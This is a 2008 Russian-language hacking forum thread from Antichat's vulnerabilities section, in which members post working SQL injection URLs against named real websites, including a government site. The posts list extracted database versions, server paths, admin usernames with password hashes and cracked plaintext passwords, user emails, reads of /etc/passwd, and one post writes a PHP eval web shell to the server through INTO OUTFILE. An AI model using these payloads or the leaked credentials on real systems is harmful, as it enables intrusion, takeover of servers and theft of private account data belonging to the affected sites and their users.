ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6171  
Старый 03.08.2008, 00:01
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

http://popsdb.twystneko.com
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,version(),user(),database())))+limit+1,1--

version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /home/virtual/site198/fst/var/www/popsdb/list.php
Админка - http://popsdb.twystneko.com/admin


Далее, база с админом:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+nc_users+limit+1,1--
admin:2dfc97e5e093b4b339ad510433d2e9ff:cafe@nakedc ybercafe.com - расшифрованный пасс: naked

Ещё одна база всего с 1 человеком:
Код:
http://popsdb.twystneko.com/list.php?id=1+union+select+unhex(hex(concat_ws(0x3a,user_login,user_pass,user_email)))+from+bg_users+limit+2,1--
stephen:3e5a1b3b990187c9fb8e8156ce25c243:stephen@i crossroads.com

++++++++++++ Пойдём дальше.


http://dennis-oppenheim.com
Код:
http://www.dennis-oppenheim.com/list.php?id=-1+union+select+concat(0x3a,version(),0x3a,user(),0x3a,database()),1,1/*

version() - 5.0.51a-community
user() - twystneko@localhost
database() - twystneko
Раскрытие пути - /hsphere/local/home/rhjo2/dennis-oppenheim.com/list.php

++++++++++++ Пойдём дальше.


http://hivolume.com
Код:
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(version(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(user(),1),1),555/*
http://www.hivolume.com/en/list.php?aftermarket_part=-1+union+select+aes_decrypt(aes_encrypt(database(),1),1),555/*

version() - 4.1.11-Max
user() - yads@localhost
database() - hivolume
Раскрытие пути - /home/sites/site4/web/en/list.php

++++++++++++
Так-же отдельное спасибо пользователям "sabe" и "Basurman", за помощь в вопросах по SQL.

Последний раз редактировалось Nightmarе; 03.08.2008 в 01:00..
 
Ответить с цитированием

  #6172  
Старый 03.08.2008, 01:03
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Eutrainingsite.com - PR 6
Цитата:
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,table_name,version ()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55+from+information_schema.tables/*
5 ветка.. таблы.
Цитата:
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,jog_szint,jelszo), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5+from+admin/*
/admin - 403
Цитата:
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,nickname,password) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55+from+cusers+limit+0,1/*
/forum.php
Цитата:
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,concat_ws(0x3a,nickname,password) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55+from+newsletters+limit+0,1/*
редакторы..


Milledcarbon.com - PR 4
Цитата:
http://www.milledcarbon.com/fullNews.php?id=1+union+select+1,2,3,4,version(),6 ,7,8/*
4 ветка, подобрал талицу news )


Bustur.ru - PR 3
Цитата:
http://www.bustur.ru/town.php?id=-75+union+select+1,2,concat_ws(0x3a,table_name,vers ion()),4,5,6+from+information_schema.tables+limit+ 27,1/*
5 ветка и таблы..


Fellini.net.ua - PR 3
Цитата:
http://top.fellini.net.ua/kom.php?id=9999+union+select+mysql.user.user,mysql .user.password,2,3,4,5+from+mysql.user/*
4 ветка, рут.

Последний раз редактировалось sabe; 03.08.2008 в 06:10..
 
Ответить с цитированием

  #6173  
Старый 03.08.2008, 02:02
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.rokf.ru/autosale/?s=autos&id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a3a, password,0x3a3a,admin),8,9,10,11,12,13,14,15,16+fr om+phorum_users+limit+0,50/*

Login: admin
pass: adminus
Дешевый админ =)

Есть еще табличка dealers быть может в ней где-то зарыт ключик к
http://www.rokf.ru/admin

Но уж очень геморно рыть этот шлак )
 
Ответить с цитированием

  #6174  
Старый 03.08.2008, 02:20
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Eggs.net.ua - PR 4
Веселі Яйця
Цитата:
http://eggs.net.ua/game.php?id=-9+union+select+1,table_name,table_schema,version() ,5,6,7,8,9,0+from+information_schema.tables/*
5 ветка и таблы..
Цитата:
http://eggs.net.ua/game.php?id=-9+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,0+from+_Users/*
eggs_admin;eggs210705
Цитата:
http://eggs.net.ua/game.php?id=-9+union+select+1,concat_ws(0x3a,ah_name,ah_pass),3 ,4,5,6,7,8,9,0+from+fn_auth/*
еще пассы..
Цитата:
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex(concat_ws(0x3a,name,cle ar,crypt))),3,4,5,6,7,8,9,0+from+maildb.users/*
мыльники..
Цитата:
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex(concat_ws(0x3a,user,pas sword))),3,4,5,6,7,8,9,0+from+mysql.user/*
и самое вкусное..)
Цитата:
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex(load_file(0x2F6574632F7 06173737764))),3,4,5,6,7,8,9,10/*
file_priv y
Цитата:
http://eggs.net.ua/game.php?id=-9+union+select+1,unhex(hex('%3C?php%20eval($_GET[cmd]);?%3E')),3,4,5,6,7,8,9,0+into+outfile+'/tmp/vital.php'/*
залили шелл..)


Pangkalpinang.go.id - PR 3
Цитата:
http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,version(),4,table_name,6,7,8+fr om+information_schema.tables+limit+24,1
5 ветка и таблы-мазахистов.)
Цитата:
http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,3,4,concat_ws(0x3a,fullname,pas sword),6,7,8+from+f011
/admin


Mypspwebsite.com
Цитата:
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(user,0x3 a,password),4,5,6,load_file(0x2f6574632f7061737377 64),8,9,version(),user()+from+mysql.user--
рут.. и /admin/members/default.php

Cyberblue.it-lighthouse.com
Цитата:
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(username ,0x3a,password),4,5,6,7,8,9,10,11+from+cyberblue.u sers--
юзеры )

It-lighthouse.com
Цитата:
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(username ,0x3a,password),4,5,6,7,8,9,10,11+from+itl_databas etables.itl_jobStaff--
непонятные пароли
Цитата:
http://mypspwebsite.com/order.php?id=null+union+select+1,2,concat(user_nam e,0x3a,user_password),4,5,6,7,8,9,10,11+from+arthu r.cpg143_users--
сайт под эту базу не был обнаружен.)


Crestron-home.ru
Цитата:
http://www.crestron-home.ru/catalog/type.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),1 3,14,15,16,17,18,19,20/*
Animedvd.ru
Цитата:
http://www.animedvd.ru/serial.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,10,11,version(), 13/*

Последний раз редактировалось sabe; 03.08.2008 в 19:21..
 
Ответить с цитированием

  #6175  
Старый 03.08.2008, 13:44
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от luz3r  
Код:
http://una.ge/eng/artdetail.php?group=articles&id=102
PHP код:
http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,version(),4,5,6,7,8,9 
PHP код:
http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables+limit+16,10 
Дальше сам крути

Последний раз редактировалось DDoSька; 03.08.2008 в 13:47..
 
Ответить с цитированием

  #6176  
Старый 03.08.2008, 14:27
Аватар для Zircool
Zircool
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496

Репутация: 78
Отправить сообщение для Zircool с помощью ICQ
По умолчанию

www.cyberthing.net

http://www.cyberthing.net/video-play.php?id=9999999999+union+select+1,2,3,4,5,6,7/*

5.0.22-Debian_0ubuntu6.06.10-log
 
Ответить с цитированием

  #6177  
Старый 03.08.2008, 16:07
Аватар для luz3r
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600

Репутация: 850
По умолчанию

Цитата:
Сообщение от sabe  
http://eggs.net.ua/game.php?id=-9+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,0+from+_Users/
не ту взял , та "4"-ка =)
 
Ответить с цитированием

  #6178  
Старый 03.08.2008, 17:32
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
Post

Цитата:
Сообщение от sabe  
Eggs.net.ua - PR 4
Веселі Яйця

5 ветка и таблы..

eggs_admin;eggs210705

еще пассы..

мыльники..

и самое вкусное..)

file_priv y
БАЯН! уже второй раз постишь

http://www.google.ru/search?complete=1&hl=en&newwindow=1&q=site%3Aforum .antichat.ru+eggs.net.ua&btnG=Search&aq=f
 
Ответить с цитированием

  #6179  
Старый 03.08.2008, 19:15
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Astrakhanfm.ru - PR 4
Цитата:
http://www.astrakhanfm.ru/guest/book.php?id=-12+union+select+1,2,version(),4,5,6,7,8,9--
Glier.ru - PR 3
Цитата:
http://www.glier.ru/dsp.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,table_na me),8,9,10,11,12,13,14+from+information_schema.tab les+limit+17,1/*&did=9999
5 версия, таблы..
Цитата:
http://www.glier.ru/dsp.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,pa ss),8,9,10,11,12,13,14+from+admins+limit+0,1/*&did=9999
/admin


Activetoy.co.uk - PR 3
Цитата:
http://www.activetoy.co.uk/product.php?id=699+union+select+unhex(hex(versio() )),2,3,4,5+limit+1,1/*
Kenzahealth.co.za
Цитата:
http://www.kenzahealth.co.za/shop.php?id=0+union+all+select+1,2,version(),4,6,c oncat_ws(0x3a,table_name)+from+information_schema. tables+limit+28,1--
5 ветка, нужная нам таблица...
Цитата:
http://www.kenzahealth.co.za/shop.php?id=0+union+all+select+1,2,version(),4,6,c oncat_ws(0x3a,username,password)+from+ispcdb.membe r_login--
мемберы..
Цитата:
http://www.kenzahealth.co.za/shop.php?id=0+union+all+select+1,2,version(),4,6,c oncat_ws(0x3a,user,password)+from+mysql.user--
рут....


Ash-graphics.co.uk
Цитата:
http://www.ash-graphics.co.uk/news-page.php?id=-27+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
Robappelhof.com
Цитата:
http://www.robappelhof.com/view.php?sub=yes&id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord,version()),5,6,7,8,9+from+users/*
Chichomerida.com
Цитата:
http://www.chichomerida.com/Departamentos/eng/detalles.php?id=-1+union+select+all+1,2,3,4,version(),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49/*
Nea7
ты думаеш я помню что выкладывал ? ты знаеш через сколько сайтов мои руки проходят ? тем более то что выкладовал уже не актуально! + в антибояне нету!

Последний раз редактировалось sabe; 06.08.2008 в 00:44..
 
Ответить с цитированием

  #6180  
Старый 03.08.2008, 20:26
Аватар для dudits
dudits
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме:
263861

Репутация: 6
По умолчанию

не работает ... пустая страница вылезает, и что значит это ??:

/forum

/admin
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ